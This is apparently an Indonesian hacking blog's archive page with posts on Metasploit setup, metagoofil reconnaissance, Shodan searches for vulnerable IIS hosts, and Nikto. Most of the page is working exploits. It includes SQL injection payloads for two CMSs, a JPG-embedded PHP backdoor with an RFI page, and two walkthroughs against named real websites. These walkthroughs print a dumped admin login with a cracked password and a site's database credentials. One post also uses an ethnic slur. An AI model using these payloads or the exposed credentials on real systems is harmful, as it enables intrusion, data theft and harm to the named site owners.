Browsing "Older Posts"

Home » Tekhnik Hacking

Install Metasploit 4.0.0 di Ubuntu 10.04

Metasploit adalah suatu tools yang sangat berguna untuk audit security dan untuk penetration testing terhadap sistem keamanan komputer dan Sistem Operasinya. Pada kesempatan kali ini saya akan coba sharing cara install metasploit 4.0.0 di ubuntu 10.04 , walaupun sudah ada pada keluarga debian pada saat ini yang telah menyediakan metasploit framework tersebut pada sistem operasinya, yaitu Backtrack. 




To The Point.....


Buka terminalnya dulu, & Follow me... RABBIT!!

sudo apt-get install -y ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
Setelah beres install yang di atas, sekarang download metasploit 4, ukuran filenya sekitar 75.8 MB:
wget http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2
Selesai download extract file tersebut, menggunakan perintah "tar -jxvf"
tar -jxvf framework-4.0.0.tar.bz2
Buat dulu folder metasploit pada direktori "/opt/metasploit4", dengan menggunakan perintah 
sudo mkdir /opt/metasploit4/

kemudian pindahkan folder msf3 hasil extract tadi ke direktori "/opt/metasploit4" tadi dengan mengetikan perintah
sudo mv msf3 /opt/metasploit4/
kemudian ubah owner direktori "/opt/metasploit4/msf3" dengan mengetikan perintah
sudo chown -R root:root /opt/metasploit4/msf3
kemudian, ketikan perintah
sudo ln -s /opt/metasploit4/msf3/msf* /usr/local/bin
setelah itu kembali ke direktori "/opt/metasploit4/msf3" untuk melakukan update SVN metasploitnya, dengan mengetikan.

sudo svn update
Selesai,,,,,

Kemudian buka terminalnya lagi untuk menjalankan metasploitnya

metasploit dengan console
msfconsole
metasploit dengan GUI
msfgui

Semoga berguna dan maaf kalo ada kesalahan dalam penulisan....
Kamis, 29 September 2011

Menggunakan metagoofil.py di windows

Metagoofil adalah salah satu tool untuk mengumpulkan informasi yang dirancang untuk mengekstrak metadata dari dokumen publik (pdf, doc, xls, ppt, odp, ods) yang ada di target / website korban. Sebenernya bisa gunain keyword google hack aja
Contoh google hack yang di implementasikan pada tool ini :



intitle:"index of" filetype:pdf
intitle:"index of" filetype:doc
intitle:"index of" filetype:xls

Jika menggunakan Backtrack , aplikasi itu ada di menu "information gathering" atau lewat terminal
root@bt:-$cd /pentest/enumeration/google/metagoofil
dan ketik perintah
python metagoofil.py
Disini saya membahas Metagoofil untuk windows !!!
Sebelum di gunakan mari kita berdo’a menurut kepercayaan masing-masing
Kalo belum ada python di windows-nya, install dulu python installer untuk windows
Download metagofilnya “http://www.edge-security.com/metagoofil.php”
download “ libextractor” for windows,
http://www.gnu.org/software/libextractor/download.html
Mirror: http://ftpmirror.gnu.org/libextractor/libextractor-0.5.23-w32.zip (12.964MB)
Next....

1 - extract .zip archive-nya
2 - copy semua file .dll pada "lib/libextract/*.dll" ke folder "bin/"
3 - copy-paste atau Cut Folder “bin” tadi ke tempat folder metagoofil
4 - Cari dan Edit file metagoofil.py

print "\n*************************************"
print "*MetaGooFil Ver. 1.4b            *"
print "*Coded by Christian Martorella      *"
print "*Edge-Security Research             *"
print "*cmartorella@edge-security.com      *"
print "*************************************\n\n"
global word,w,limit,result,extcommand
#Win
##extcommand='c:\extractor\\bin\extract.exe -l libextractor_ole2'
#OSX
#extcommand='/opt/local/bin/extract'
#Cygwin
#extcommand='/cygdrive/c/extractor/bin/extract.exe'
extcommand='/usr/bin/extract'
sehingga menjadi seperti ini
print "\n*************************************"
print "*MetaGooFil Ver. 1.4b            *"
print "*Coded by Christian Martorella      *"
print "*Edge-Security Research             *"
print "*cmartorella@edge-security.com      *"
print "*************************************\n\n"
global word,w,limit,result,extcommand
#Win
extcommand='bin\extract.exe -l libextractor_ol2'
#OSX
#extcommand='/opt/local/bin/extract'
#Cygwin
#extcommand='/cygdrive/c/extractor/bin/extract.exe'
#extcommand='/usr/bin/extract'
Keterangan : perhatikan text yang di cetak BOLD, itu yang di rubah !!

Kalo toolnya pas di jalankan tidak respon atau blank, permasalahnya pada folder "bin"  tidak ada file
"libltdll-7.dll dan "libintl-8.dll”,
Dan solusi dari saya  untuk melengkapi library-nya, langsung download di
https://gnunet.org/svn/GNUnet-docs/WWW/download/win32/Setup-0.8.1b.exe
install....
Setelah di install buka Folder "bin" pada GNUnet dan cari file "libltdll-7.dll" dan "libintl-8.dll"
kemudian copy-paste ke folder bin pada metagofil
nah... buka dah cmd nya ( disarankan pake open-cmd, jadi ga usah harus lewat "Run" --> "CMD" ..bla..bla.. )masukan perintah

metagoofil.py



langsung saja ketik perintahnya

metagoofil.py -d www.bi.go.id -l  5 -f all -o bi.html -t bi-files
keterangan:
-d www.bi.go.id = Domain target
-l 5 = membatasi hasil
-f all = semua file yang (pdf, doc, xls, ppt, odp, ods, dan lainnya)
-o bi.html = List Output File hasil pencarian menggunakan format .html
-t  = folder file target yang telah di download
Ini adalah contoh hasil scan pada Command Prompt



Dan bisa di liat hasil download pada folder yang tadi di ketik!!
Yang ga mau ribet prosedurnya, dan langsung di jalankan bisa download di
http://www.4shared.com/file/DIMEWzkt/metagoofil-14b.html    (10,346 kb)


Semoga berguna!!
Reference Developer:
http://www.edge-security.com/metagoofil.php
Kamis, 02 Juni 2011

SocialCMS1.0.2 Multiple CSRF Vulnerabilities

Title: socialcms1.0.2 Multiple CSRF Vulnerabilities
Author: vir0e5 a.k.a banditc0de
Date: Wed 20 april 2011 11:18:22 AM
Vendor: www.socialcms.com
Download: http://sourceforge.net/projects/socialcms/





Create Admin User

Default site title
Selasa, 26 April 2011

osPHPSite SQL Injection Vulnerability




 
 # Exploit Title: osPHPSite SQL Injection Vulnerability
# Author : vir0e5
# Date : 1-12-2011
# Vendor : http://www.osphpsite.com
# Software Link: http://sourceforge.net/projects/osphpsite
# Version: ALL VERSION


[ Vulnerable File ]

~ index.php

[ Exploit ]
~ http://www.[sitename].com/index.php?id= [Sql Injection]

[ example ]

~ http://www.[sitename].com/index.php?id=24'
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,@@VERSION,3,4,5,6,7,8--
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 +from+information_schema.tables+where+table_schema =database()--
~ And More.....

Membuat php Shell inject dengan extensions jpg / jpeg

Saya akan membahas tentang Membuat php shell inject dengan extensions *.jpeg atau *.jpg.
Download dulu tool edjpgcom atau alat bantu untuk penggabungan antara script dan file gambar  tersebut.
Screenshot::











Download tool :

Mirror 1  |   Mirror2


Setelah selesai download, Drop & Drag file *.jpg  ke Tool tersebut…. Dan masukan script php shell injection
(backdoor)
Shell .jpg  yang sudah jadi buatan saya bisa di sedot di (malay.jpg)
Contoh Source BUG  RFI (Remote File Inclussion) , sebagai percobaan
Masukan source page ini di file index.php


<?php

//kesalahan script ini bisa menimbulkan BUG RFI (Remote File Inclussion)
    $rfi = $_GET['hal'];
    include($rfi);
?>


Simpan di localhost/webserver sendiri (percobaan)
Ketikan URL
http://localhost/index.php?hal=malay.jpg



Good Luck!!


Note: Simpan file backdoor malay.jpg dan index.php tersebut di webserver sendiri/localhost untuk percobaan...
Selasa, 15 Juni 2010

Computer Search Engine










Jalan-jalan dengan paman google , surfing sana-surfing sini..dan saya nemuin yang namanya "Computer Search Engine" menurut saya membantu dalam pengujian penetrasi suatu Hosts. Dan mempunyai Filter "HTTP (80)" , "Telnet (23)", "" , "" . Silahkan di coba...

keywordnya untuk port menggunakan "port":

Example:
port:80 (menghasilkan port 80 atau http pada suatu host)
port:23 (menghasilkan port 23) atau telnet pada suatu host)
port21 (menghasilkan port 21 atau  FTP pada suatu host)
port:22 (menghasilkan port 22 atau SSH pada suatu host)

Keyword untuk kode negara menggunakan "Country":
Example: country: ID (untuk kode negara indonesia)


Untuk menguji penetrasi gunakan keyword:
country:my Microsoft iis version 6.0



Keterangan penetrasi di atas:
country:my Microsoft iis version 6.0 
( akan mencari host yang menggunakan Microsoft iis version 6.0 di negara "MALAY-s**t")
kenapa menggunakan perintah Microsoft iis version 6.0, karena terdapat BUG  WebDAV (IIS 6.0)
dan exploitnya bisa di cari disini!! 




Semoga bermanfa'at!!
 

Linknya:  http://www.shodanhq.com

Note: Untuk menggunakan Filter-filter di atas harus registrasi terlebih dahulu!!



Jumat, 11 Juni 2010

Tutorial SQL injection

Victim: http://www.bprdinamika.co.id
Vuln : http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1
Tambah single quote (') setelah angka 1
URL:
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1'

Hasilnya:
Fatal error: Call to a member function FetchNextObject() on a non-object in /home/bprdin01/public_html/parts/main/produk_detail.php on line 7

Ternyata ada BUG dan saya coba inject!!

setelah dapet pesan Error tambah perintah ( order by ) untuk mencari column
jika ERROR nya sama kaya yang di atas maka itu yang kita inject!!
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 1--
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 2--
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 3--
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 4--
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 5--
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 6--

Ternyata ada pesan ERROR, ketika di masukan Order by 6-- Kalo tidak ada pesan ERROR , gosok terus, sampe ada pesan ERROR
Berarti kita inject pas “order by 5--”, karena pas "order by 6--" Terdapat pesan ERROR!!
Kemudian kita lakukan perintah "UNION SELECT" di akhiri urutan Column dari pertama sampai yang akhir
Dan jangan lupa tambahkan tanda (-) di awal angka parameter tersebut
URL:
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=-1+UNION+SELECT+1,2,3,4,5--
Nanti disana akan muncul angka…ternyata yang muncul adalah angka 2 , jadi masukan perintah
@@version / version() ,untuk mengetahui versi database mysql si korban

URL:
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=-1+UNION+SELECT+1,@@version,3,4,5--

Hasilnya:
5.0.90-community-log (dan ini yang akan muncul)
Setelah mengetahui versi dari sql Database tersebut, dilanjutkan dengan mengetahui isi table
--> group_concat(table_name) <-- di tempat hasil versi sql nya --> +from+information_schema.tables+where+table_schema =database()-- <-- di simpan di angka terakhir http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- dan hasilnya agenda,arus,aruskap,bulan,fieldlapo,galeri,kap,kappub,komkon,komkonkap,komkonpub,link,lr,lrkap,
lrpub,neraca,neracakap,neracapub,news,produk,strogdetail,strogmain,strogposisi,sukubunga,user,
validasi_kap 

Ada table “user “ kita coba inject table "user" untuk melihat columnnya dengan perintah group_concat(column_name) <-- di tempat hasil versi sql nya atau angka 2 tadi Dan --> +from+information_schema.columns+where+table_name=0xhexa-- <-- perintah ini di simpan setelah angka terakhir 0xhexa artinya masukan hexadecimal;(wajib convert ke hexa agar bisa di baca oleh sql), disana kita akan mengintip 'user' maka di convert menjadi 75736572 di tambah 0x di depannya jadi 0x75736572, untuk convertnya bisa menggunakan bantuan di http://www.swingnote.com/tools/texttohex.php

URL:
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x75736572

Hasilnya:
user_id,login,password,last_ip,last_access,login_counter , inject truz sampe dapet login user/admin , kita hanya butuh 'login, password' jadi perintah injectnya --> grup_concat(login,0x3a,password) <-- 0x3a kalo di decode jadi (:) untuk memisahkan antara login dan password kemudian di akhir masukan column tadi yaitu column 'user' --> +from+user-- <-

URL:
http://www.bprdinamika.co.id/index.php?part=produklist&action=detail&produk_id=-1 union select 1,group_concat(login,0x3a,password),3,4,5 from user--
user loginnya namanya 'meilyaanied' dan 'bayu'
tapi passwordnya masih berbentuk MD5 belum di crack , crack dulu yach...
f7b79725ce921bfe0b396485b9a0f08b : 1905197927101977 (cracked)
a0a1d0c5f77a7f9e802903b9f8854768 : False (Not cracked)
sekarang cari dech halaman adminnya ...zzZZZZzz.
http://www.bprdinamika.co.id/admin (tinggal masuk..dech!!)
username : meilyaanied
password : 1905197927101977

Jangan Lupa ingetin si Om adminnya !! ^^
Semoga bermanfaat tutor seorang lamer yang haus akan ilmu pengetahuan !!
Kamis, 27 Mei 2010

SQL Injection Entry Level Content Management System (EL CMS) dengan schemafuzz.py

Ini bug yang saya temukan dan di bajak ma orang yang bernama   "HaMaDa SCoOoRPioN"  


dah jelas-jelas itu isi database saya vman ..coba bandingkan!!
http://securityreason.com/exploitalert/7413  <-- Me (25.10.2009)
http://securityreason.com/securityalert/7161 <-- HaMaDa SCoOoRPioN (25.03.2010)

show off!!
http://inj3ct0r.com/exploits/12308
http://www.exploit-db.com/exploits/12667http://securityreason.com/exploitalert/7413


[+]Title        : SQL Injection Entry Level Content Management System (EL CMS) with schemafuzz.py 

            --==[ Author ]==--
[+] Author    : [+] vir0e5 (NEWBIE) 
[+] Contact    : vir0e5[at]hackermail[dot]com
[+] Group    : TECON (The Eye COnference) Indonesia
[+] Site    : http://tecon-crew.org
********************************************

                     [Software Information ]
[+]SOftware      : Entry Level Content Management System (EL CMS)
[+]vendor        : http://www.entrylevelcms.com/
[+]Vulnerability : SQL Injection
********************************************

[ Vulnerable File ]
http://localhost/website/index.php?subj=4

                    [demo with schemafuzz.py]
|---------------------------------------------------------------
| rsauron[at]gmail[dot]com                               v5.0  
|   6/2008      schemafuzz.py                                  
|      -MySQL v5+ Information_schema Database Enumeration      
|      -MySQL v4+ Data Extractor                               
|      -MySQL v4+ Table & Column Fuzzer                        
| Usage: schemafuzz.py [options]                               
|                      -h help                    darkc0de.com 
|------------------------------------------------------------

C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6" --findcol

|------------------------------------------------------------
| rsauron[at]gmail[dot]com                               v5.0  
|   6/2008      schemafuzz.py                                  
|      -MySQL v5+ Information_schema Database Enumeration     
|      -MySQL v4+ Data Extractor                               
|      -MySQL v4+ Table & Column Fuzzer                        
| Usage: schemafuzz.py [options]                               
|                      -h help                    darkc0de.com 
|------------------------------------------------------------

[+] URL:http://localhost/website/index.php?subj=6--
[+] Evasion Used: "+" "--"
[+] 03:36:40
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 0
[+] SQLi URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3
[-] Done!

C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --full

|------------------------------------------------------------
| rsauron[at]gmail[dot]com                               v5.0  
|   6/2008      schemafuzz.py                                  
|      -MySQL v5+ Information_schema Database Enumeration      
|      -MySQL v4+ Data Extractor                               
|      -MySQL v4+ Table & Column Fuzzer                       
| Usage: schemafuzz.py [options]                               
|                      -h help                    darkc0de.com 
|------------------------------------------------------------

[+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 05:33:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
    Database: vman
    User: root@localhost
    Version: 5.0.51a

[Database]: elcms_db
[Table: Columns]
[0]pages: id,subject_id,menu_name,position,visible,content
[1]subjects: id,menu_name,position,visible
[2]users: id,username,hashed_password

[-] [05:55:27]
[-] Total URL Requests 17
[-] Done


C:\Python26\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --dump -D elcms_db -T users -C id,username,hashed_password

|------------------------------------------------------------
| rsauron[at]gmail[dot]com                             v5.0  
|   6/2008      schemafuzz.py                                  
|      -MySQL v5+ Information_schema Database Enumeration      
|      -MySQL v4+ Data Extractor                               
|      -MySQL v4+ Table & Column Fuzzer                        
| Usage: schemafuzz.py [options]                               
|                      -h help                    darkc0de.com 
|------------------------------------------------------------

[+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 05:35:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
    Database: vman
    User: root@localhost
    Version: 5.0.51a
[+] Dumping data from database "vman" Table "users"
[+] Column(s) ['id', 'username', 'hashed_password']
[+] Number of Rows: 1

[0] 9:admin:376cb350808d766e547eadc45b8f19f541d436c8:376cb350808d766e547eadc45b8f19f541d436c8:

[-] [05:35:15]
[-] Total URL Requests 3
[-] Done




If you not understand about it 
[Option/help this tools]
 schemafuzz.py -h

********************************************

Kamis, 20 Mei 2010

Local File Disclosure Vulnerability Lokomedia CMS (sukaCMS)

[+] Title : Local File Disclosure Vulnerability Lokomedia CMS (sukaCMS)
[+] Vendor : http://bukulokomedia.com
[+] Discovered : vir0e5 a.k.a banditc0de
[+] Contact : vir0e5[at]hackermail[dot]com
[+] Site : http://vir0e5.blogspot.com
[+] DorK : inurl:/downlot.php?file=

[+] Exploit : http://[host]/[dir]/downlot.php?file=../config/koneksi.php
[+] Demo : http://pulsaselluler.com/downlot.php?file=../config/koneksi.php


Tutorial :
Untuk Target awal adalah URL di atas http://pulsaselluler.com alasannya paling atas di search google..hehe..

kalau mau cari lagi silahkan gunakan "Dork" di atas atau bisa kreatif dikit..
1. Cari halaman download pada CMS tersebut
http://pulsaselluler.com/download.html
Nanti ada file-file Download , itu juga kalo ada file yang di share dari dalam web nya, kalo ga ada pake aja /downlot.php?file= , karena file download pada web tersebut menggunakan link itu.
2. Coba download file: /index.php , kenapa kita harus download/ambil file index.php dulu??? untuk cari file koneksi web tersebut, karena penting untuk menghubungkan antara web tersebut dengan Databasenya. cara dapetinnya http://pulsaselluler.com/downlot.php?file=../index.php

3. Setelah Download file index.php ,buka dengan notepad atau text editor lainnya!!
4. Cari script di dalam File tersebut yang terkoneksi dengan file yang menghubungkan ke DB
, karena file tersebut hanya ada


<?
include "rss.php";
header('location:home');
?>


nah, disana ada file include yang mengambil data file rss.php , kita coba lagi download file rss.php
, hampir sama karena tidak masuk ke Direktori lain
http://pulsaselluler.com/downlot.php?file=../rss.php

5. Biasa buka file rss.php dengan notepad, dan di dalamnya ada
<?php
include "config/koneksi.php";

$sql = mysql_query("SELECT * FROM berita ORDER BY id_berita DESC LIMIT 5");

$file = fopen("rss.xml", "w");

fwrite($file, '<?xml version="1.0"?>
<rss version="2.0">
<channel>
<title>PulsaSelluler.com Feed</title>
<link>http://pulsaselluler.com</link>
<description>Feed Description</description>
<language>en-us</language>');

while($r=mysql_fetch_array($sql)){
  $isi_berita = htmlentities(strip_tags(nl2br($r[isi_berita]))); // membuat paragraf pada isi berita dan mengabaikan tag html
  $isi   = substr($isi_berita,0,220); // ambil sebanyak 220 karakter
  $isi   = substr($isi_berita,0,strrpos($isi," ")); // potong per spasi kalimat

  fwrite($file, "<item>
                 <title>$r[judul]</title>
                 <link>http://pulsaselluler.com/berita-$r[id_berita]-$r[judul_seo].html</link>
                 <description>$isi ...</description>
                 </item>");
}

fwrite($file, "</channel></rss>");
fclose($file);
?>

Ternyata dapet file koneksi.php di direktori config .. kita telusuri lagi, karena dah tau silahkan ambil file koneksi.php tersebut, karena di dalam directory /config , kita cuma nambahin
http://pulsaselluler.com/downlot.php?file=../config/koneksi.php

6. Buka File tersebut dan hasilnya kita mendapatkan , username , password, dan nama database web tersebut
<?
$server = "localhost";
$username = "pulsasel_kangbas";
$password = "117167117167";
$database = "pulsasel_pusell";

// Koneksi dan memilih database di server
mysql_connect($server,$username,$password) or die("Koneksi gagal");
mysql_select_db($database) or die("Database tidak bisa dibuka");
?>

http://securityreason.com/securityalert/7359
http://packetstormsecurity.org/1005-exploits/lokomediacms-disclose.txt
http://www.exploit-db.com/exploits/12651
http://inj3ct0r.com/exploits/12285 

Note: File "koneksi.php" adalah file yang menghubungkan antara aplikasi web tersebut dengan database.
untuk mempelajari CMS itu, saya share link donlodnya ... http://www.4shared.com/file/yO7zThp3/cmslokomediatar.html
Senin, 17 Mei 2010

Nikto 2.03/2.04 Di Windows [Download-Tutor]

Yang dibutuhkan untuk menjalankan Nikto di Windows adalah
[1] Activeperl Untuk Windows - saya menggunakan ActivePerl-5.8.9.826-MSWin32-x86-290470 standard untuk windows XP 32 bit pada mesin x86

 
[2] Nikto 2.03/2.04 yang telah di setting untuk berjalan di Windows -




Instalasi:
[1] Install Active Perl
[2] Ekstrak Nikto yang telah di download ke C:\nikto

Penggunaan
[1] Jalankan Nikto melalui cmd start - run - cmd lalu drag dan drop nikto.pl ke command prompt dan ketik


-h www.target.com
Click here to
 enlarge
Nikto akan mencari informasi dan menampilkan kelemahan yang ditemukan di dalam server web tersebut. Nikto juga bisa dijalankan dengan beberapa windows baru untuk mencari kelemahan lebih dari satu website.


 
Selasa, 16 Maret 2010